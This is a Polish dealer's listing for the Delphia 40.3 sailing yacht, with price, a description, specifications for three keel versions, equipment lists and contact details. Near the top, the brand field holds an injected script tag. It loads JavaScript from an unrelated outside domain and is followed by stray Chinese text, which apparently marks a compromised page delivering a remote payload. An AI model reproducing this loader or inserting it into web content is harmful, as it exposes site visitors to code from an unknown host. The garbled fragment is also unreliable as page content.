Cena z vat 172 323 PLN
Leasing operacyjny, finansowy, zwrotny

Delphia 40.3

"<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=4'></script>连锁品牌
Delphia
Lokalizacja
Olecko, Polska

Delphia 40.3 - jacht oceaniczny przetestowany przez mistrzów

Delphia 40.3 to klasyczny True Yacht. Przygotowany specjalnie na największe oceaniczne wody. Zbudowany przy wykorzystaniu technologii LIM oraz YSI, dzięki której jednostka jest niezwykle wytrzymała i co za tym idzie bezpieczna.

Delphia 40.3 to wzorowy przykład zintegrowania struktury, gdzie podwięzie wantowe znajdują się wewnątrz jachtu. Dzięki takiemy rozwiązaniu jest on jeszcze bardziej wytrzymały i gotowy na wszelkie wyzwania. Dowodem czego jest słynny rejs kapitana Tomasza Cichockiego, który właśnie na tej jednostce samotnie opłynął Ziemię.

Delphia 40.3 to jacht świetnie zrównoważony, ergonomiczny, o wysokim stopniu funkcjonalności (przestronny kokpit, wygodna platforma kąpielowa). Posiada on 5 wersji zabalastowania, z liczbą kabin od 2 do 4, oraz różne opcje wyposażenia z bogatym standardem, pozwalają Delphii 40.3 spełniać się równie dobrze w roli jachtu armatorskiego, szkoleniowego czy czarterowego. Można go być wyposażyć w jedno lub dwa koła sterowe. W każdej wersji umożliwe jest dostosowanie jednostki do indywidualnych potrzeb przyszłego właściciela.

Spory wybór opcji i materiałów do wykończenia wnętrza na Delphii 40.3, daje możliwość dostosowania jego przestrzeni do swoich potrzeb. Solidne wykończenie, dobrej jakości materiały oraz ponadprzeciętna ergonomia wnętrza czynią z Delphii 40.3 doskonały wybór dla osób, które oprócz stylistyki, cenią praktyczne walory jachtu.

Przedstawiona oferta ma charakter poglądowy i nie stanowi oferty w rozumieniu przepisów Kodeksu Cywilnego. Dane techniczne jachtu, oznaczenie, zdjęcia oraz cena pochodzą z oferty producenta i mogą różnić się od danych aktualnych.

Wersja balastowa - kil długi

Wymiary
Długość całkowita (LOA) 12,35 m
Dlugośc kadłuba 11,95 m
Największa szerokość 3,94 m
Zanurzenie maksymalne 2,27 m
Wysokość z balastem 4,40 m
Wysokość bez balastu 2,74 m
Szerokość do transportu 3,94 m
Długość do transportu 12,35 m
Wysokość masztu 15,35 m
Wys. masztu od wody 16,15 m
Żagle
Pow. żagla głównego 42,20 m2
Pow. żagla przedniego 39,80 m2
Certyfikat CE
Kategoria A - 10
Sterowanie
Sposób sterowania Koło sterowe
Typ balastu/kila Kil długi
Zbiorniki
Zbiornik paliwa 210 l
Zbiornik wody czystej 320 l
Zbiornik brudnej czystej 94 l
Masa
Masa całkowita 8 600 kg
Masa balastu 2 760 kg
Silnik
Moc maksymalna 55 HP
Rodzaj paliwa Diesel
Typ silnika Wbudowany

Wersja balastowa - kil krótki

Wymiary
Długość całkowita (LOA) 12,35 m
Dlugośc kadłuba 11,95 m
Największa szerokość 3,94 m
Zanurzenie maksymalne 1,80 m
Wysokość z balastem 3,85 m
Wysokość bez balastu 2,74 m
Szerokość do transportu 3,94 m
Długość do transportu 12,35 m
Wysokość masztu 15,30 m
Wys. masztu od wody 17,00 m
Żagle
Pow. żagla głównego 42,20 m2
Pow. żagla przedniego 39,80 m2
Certyfikat CE
Kategoria A - 10
Sterowanie
Sposób sterowania Koło sterowe
Typ balastu/kila kil krótki
Zbiorniki
Zbiornik paliwa 210 l
Zbiornik wody czystej 320 l
Zbiornik brudnej czystej 94 l
Masa
Masa całkowita 9 160 kg
Masa balastu 3 320 kg
Silnik
Moc maksymalna 55 HP
Rodzaj paliwa Diesel
Typ silnika Wbudowany

Wersja mieczowo-balastowa

Wymiary
Długość całkowita (LOA) 12,35 m
Dlugośc kadłuba 11,95 m
Największa szerokość 3,94 m
Zanurzenie maksymalne 1,95 m
Wysokość z balastem 3,10 m
Wysokość bez balastu 2,74 m
Szerokość do transportu 3,94 m
Długość do transportu 12,35 m
Wysokość masztu 14,45 m
Wys. masztu od wody 16,10 m
Żagle
Pow. żagla głównego 42,20 m2
Pow. żagla przedniego 39,80 m2
Certyfikat CE
Kategoria A - 10
Sterowanie
Sposób sterowania Koło sterowe
Typ balastu/kila kil podnoszony
Zbiorniki
Zbiornik paliwa 210 l
Zbiornik wody czystej 320 l
Zbiornik brudnej czystej 94 l
Masa
Masa całkowita 9 400 kg
Masa balastu 3 300 kg
Silnik
Moc maksymalna 55 HP
Rodzaj paliwa Diesel
Typ silnika Wbudowany

Wyposażenie standardowe

Kadłub

  • Żelkot koloru białego
  • Laminat wykonany ręcznie, z barierą antyosmozową, konstrukcja przekładkowa
  • Ciemnoniebieskie pasy linii wodnej
  • Żeliwny balast
  • Łożyskowany ster

Takielunek, ożaglowanie

  • Maszt z olinowaniem stałym, achtersztag na ściągaczach
  • Bom z obciągaczem
  • Grot, listwy krótkie, dwa refy
  • Genua rolowana
  • Komplet fałów i szotów
  • 2 korby kabestanowe (długa i krótka)
  • Światło kotwiczne, silnikowe i oświetlenie pokładu

Kabiny, toalety

  • Wybudowa wnętrza ze sklejki o kolorze buku, nieznacznie może różnić się odcieniem, lakier matowy
  • Podłoga ze sklejki HPL w jednolitym kolorze
  • Tapicerka (biały materiał obiciowy w kabinach, kolekcja NORDIC BASIC w mesie)
  • Burty wyłożone panelami
  • Kabina dziobowa z podwójną koją, szafą i półkami
  • Laminatowa kabina WC (dziobowa) z manualną toaletą oraz zbiornikiem na fekalia 47 L
  • 2 kabiny rufowe z podwójnymi kojami, szafami i półkami
  • Laminatowa kabina WC (rufowa) z manualną toaletą oraz zbiornikiem na fekalia 47 L

Instalacja gazowa

  • Instalacja gazowa
  • Tester szczelności instalacji

Silnik

  • Silnik Volvo D2-40, S-drive
  • Stała śruba napędowa, 2-płatowa
  • Zbiornik paliwa 210 L

Pokład

  • Żelkot koloru białego
  • Laminat wykonany ręcznie, konstrukcja przekładkowa
  • Powierzchnia antypoślizgowa
  • Łoże kotwiczne
  • Luk kotwiczny z dodatkowym wzmocnieniem na windę kotwiczną
  • Kosz dziobowy
  • 2 kosze rufowe
  • 2 handrelingi
  • Aluminiowa listwa odbojowa z sześcioma półkluzami
  • 6 knag cumowniczych: 2 dziobowe, 2 centralne, 2 rufowe
  • 8 słupków relingowych z podwójnym relingiem
  • 2 duże luki (kabina dziobowa, mesa)
  • 9 małych luków
  • 3 świetliki w pokładzie (mesa)
  • 2 świetliki boczne
  • 2 szyny genuy z wózkami
  • 2 bloki szotów grota
  • 8 bloków zwrotnych
  • 9 stoperów lin
  • 2 samoknagujące kabestany 40
  • Światła nawigacyjne typu LED

Mesa, kambuz

  • Półki i szafki po obu stronach mesy
  • Stolik nawigacyjny
  • Stół z L-kształtną sofą i z siedziskiem
  • Podwójny zlew ze stali nierdzewnej z pokrywami
  • Bateria na ciepłą i zimną wodę
  • Kuchenka dwupalnikowa z piekarnikiem, na kardanie
  • Lodówka 90 L, ładowana od góry
  • Blat HPL w ciemnym kolorze
  • Szafki i półki w kambuzie
  • Gaśnica i koc gaśniczy
  • Kosz na śmieci

Instrumenty nawigacyjne

  • Kompas magnetyczny
  • B&G Triton, Prędkość/Głębokość/Temperatura

Kokpit

  • Samoodpływowy kokpit z czterema bakistami
  • Bakista na butlę gazową
  • Siedzenia wyłożone teakiem
  • Podłoga wyłożona teakiem
  • Suwklapa i dwuczęściowa sztorcklapa z zamkiem
  • 2 handrelingi
  • Luk w każdej kabinie rufowej
  • Kolumna sterowa z kołem sterowym w oplocie skórzanym i relingiem
  • Panel sterujący silnika
  • Rumpel awaryjny
  • 2 samoknagujące kabestany 50
  • Drabinka rufowa
  • Stopień rufowy wyłożony teakiem

Instalacja elektryczna

  • Oświetlenie wnętrza LED
  • Rozdzielnia elektryczna, wskaźnik napięcia akumulatorów, poziomu zbiorników wody, fekaliów, paliwa
  • Wyłączniki główne prądu
  • 1 gniazdo 5 V USB przy stoliku nawigacyjnym
  • Gniazda 230 V (kabiny, stolik naw., kambuz)
  • Akumulatory życiowe 2xAGM 110 Ah
  • Akumulator startowy 1xAGM 110 Ah
  • Ładowarka 230V/12V/40A z przewodem 25 m

Instalacja wodna

  • Ciśnieniowa instalacja ciepłej i zimnej wody
  • Zbiornik wody pitnej 320 L, bojler 20 L
  • Pompa zęzowa elektryczna
  • Pompa zęzowa manualna

Inne

  • Foliowanie łodzi
  • Załadunek

Wyposażenie dodatkowe

Kadłub

  • Kil krótki zanurzenie 1,8 m
  • Wersja balastowo-mieczowa, zanurzenie 0,98 / 1,95 m, silnik Nanni N4.38 na wał, standardowy zbiornik paliwa 150 L, dwie płetwy sterowe
  • Ster strumieniowy dziobowy, tunelowy 4 kW + akumulator AGM 110 Ah
  • Kadłub w kolorze (kolor według wzornika DY)
  • Antyfauling – kolor czarny
  • Pasy linii wodnej na kadłubie (kolor według wzornika DY)
  • Pas ochronny wzdłuż kadłuba z teaku
  • Luki nieotwierane w kadłubie, jeden po każdej stronie mesy

Takielunek, ożaglowanie

  • System rolowania grota, grot i fok/genua z ACL’u
  • Zwalniany dodatkowy sztag przedni
  • Mechaniczny napinacz achterszatgu
  • Talia achtersztagu
  • Bom z systemem refowania jedną liną
  • Gazowy napinacz bomu
  • Grot pełnolistwowy z wózkami MDS, takielunek Selden
  • Szyna talii grota z wózkiem
  • Prowadzenie grota typu German sheeting (zamiast standardowego)
  • Lazy Bag + Lazy Jack – kolor ciemnoniebieski MARINE BLUE
  • Genua w wersji do refowania
  • Fok sztormowy
  • Ochrona UV foka/genuy – kolor ciemnoniebieski MARINE BLUE
  • Genaker
  • Osprzęt genakera: bloki, ucha, olinowanie ruchome, wytyk genakera

Instrumenty nawigacyjne

  • Wiatrowskaz
  • B&G Triton Wind – przetwornik
  • B&G Triton – dodatkowy wyświetlacz
  • B&G V50 VHF Marine Radio, DSC z kablem na maszt i anteną (kompatybilne z elektroniką B&G)
  • NAIS-400 (kompatybilne z elektroniką B&G)
  • B&G Vulcan 7 Chartplotter
  • B&G Zeus 7 Chartplotter
  • B&G ForwardScan
  • B&G autopilot

Pokład

  • Pokład w teaku
  • Winda kotwiczna 1000 W
  • Kotwica Delta 16 kg z 50 m 8 mm łańcuchem galwanizowanym
  • Zestaw do mycia pokładu
  • Bramki burtowe w relingach
  • 2 kabestany 45 zamiast standardowych 40
  • 6 odbijaczy, 4 liny cumownicze
  • Siedzenia na koszach rufowych
  • Uchwyt do silnika zaburtowego zamontowany na koszu rufowym
  • Flagsztok

Mesa, kambuz

  • Sofa przesuwana w mesie
  • Małe siedzisko przy stole w mesie (w wersji 3 lub 4 kabinowej)
  • Stół opuszczany w mesie + dodatkowy materac
  • Blat z materiału korian/staron (według wzornika DY)
  • Dwie lodówki szufladowe DR-49 (zamiast standardowej)

Instalacja elektryczna

  • Instalacja elektryczna 120 V
  • Agregat prądotwórczy 3,5 kW, 230 V, 50 Hz (uwaga: węższe kabiny rufowe)
  • Dodatkowe gniazda: 1x230V i 1x5V USB
  • Fusion MS-RA70 Series Marine Radio AM/FM/ipod/USB, bluetooth, 2 głośniki Fusion 4” w messie, antena
  • LED TV 12 V z anteną
  • Dodatkowy akumulator AGM 110 Ah + większa ładowarka

Instalacja wodna

  • Złącze pokładowe do zewnętrznego zasilania wodą pod ciśnieniem (podłączony do instalacji na łodzi)
  • Pompa wody zaburtowej

Kabiny, toalety

  • Wybudowa wnętrza ze sklejki o kolorze buku, nieznacznie może różnić się odcieniem, lakier matowy
  • Podłoga ze sklejki HPL w jednolitym kolorze
  • Tapicerka (biały materiał obiciowy w kabinach, kolekcja NORDIC BASIC w mesie)
  • Burty wyłożone panelami
  • Kabina dziobowa z podwójną koją, szafą i półkami
  • Laminatowa kabina WC (dziobowa) z manualną toaletą oraz zbiornikiem na fekalia 47 L
  • 2 kabiny rufowe z podwójnymi kojami, szafami i półkami
  • Laminatowa kabina WC (rufowa) z manualną toaletą oraz zbiornikiem na fekalia 47 L

Silnik

  • Silnik Volvo D2-50, S-drive
  • Dodatkowy zbiornik paliwa 120 L
  • Składana śruba 3-płatowa, Gori

Kokpit

  • Szprycbuda – kolor ciemnoniebieski MARINE BLUE
  • Bimini – kolor ciemnoniebieski MARINE BLUE, zakrywające cały kokpit, z okienkiem rewizyjnym
  • Wersja z dwoma kołami sterowymi
  • Stolik w kokpicie inox/laminat
  • Lodówka do stolika kokpitowego inox/laminat
  • Stolik w kokpicie inox/teak
  • Sterowanie windy kotwicznej przy kolumnie sterowej (z kokpitu) z licznikiem łańcucha
  • Składane koło sterowe
  • Sygnał dźwiękowy Marco z przyciskiem w kokpicie
  • Oświetlenie kokpitowe LED montowane na kolumnie sterowej/stoliku
  • Oświetlenie kokpitowe LED wbudowane w bom
  • Uchwyty na napoje (2 szt.)
  • 2 głośniki Fusion 4” w kokpicie
  • Dodatkowe luki w kabinach rufowych
  • Dodatkowy luk w kabinie rufowej (wersja 2 kabiny)
  • 2 kabestany 55 zamiast standardowych 50
  • Prysznic rufowy zimna + ciepła woda

Instalacja gazowa

  • Elektrozawór do gazu zamontowany w bakiście na butlę gazową z przełącznikiem i wykrywaczem gazu zamontowanym przy kuchence

Inne

  • Ogrzewanie Webasto Air Top Evo 55
  • Klimatyzacja 230 V mesy 12000 BTU (działanie z podłączenia lądowego)
  • Klimatyzacja 230 V mesy i kabiny dziobowej 16000 BTU (działanie z podłączenia lądowego)
  • Łoże do transportu morskiego (łódź z kilem zamontowanym)
  • Łoże do transportu morskiego z kilem w oddzielnym stojaku
  • Powrót łodzi na linię produkcyjną i przefoliowanie
  • Przygotowanie do transportu na boku
  • Zestaw do czyszczenia jachtu Allegrini

Prezentacja wideo jachtu Delphia 40.3

Zobacz filmy z kanału DelphiaYachtsTV na YouTube prezentujący jacht oceaniczny Delphia 40.3

Dane firmy

  • PHU Partner - Mariusz Bąkowski, os. Tysiąclecia 32/17, 31-610 Kraków
  • +48 608 101 066
  • Poniedziałek – Piątek: 8:00 – 18:00 Sobota: 8:00 – 15:00

NASI HANDLOWCY

Infolinia
Infolinia (Polska)
+48 608 10 10 66
Marcin Dąbrowski
Marcin Dąbrowski (Holandia)
+31 640 06 00 01

WYŚLIJ NAM WIADOMOŚĆ

Czytaj więcej...

INNE JACHTY DELPHIA

Ta strona korzysta z plików cookie i prosi o podanie Twoich danych osobowych w celu zwiększenia wygody przeglądania.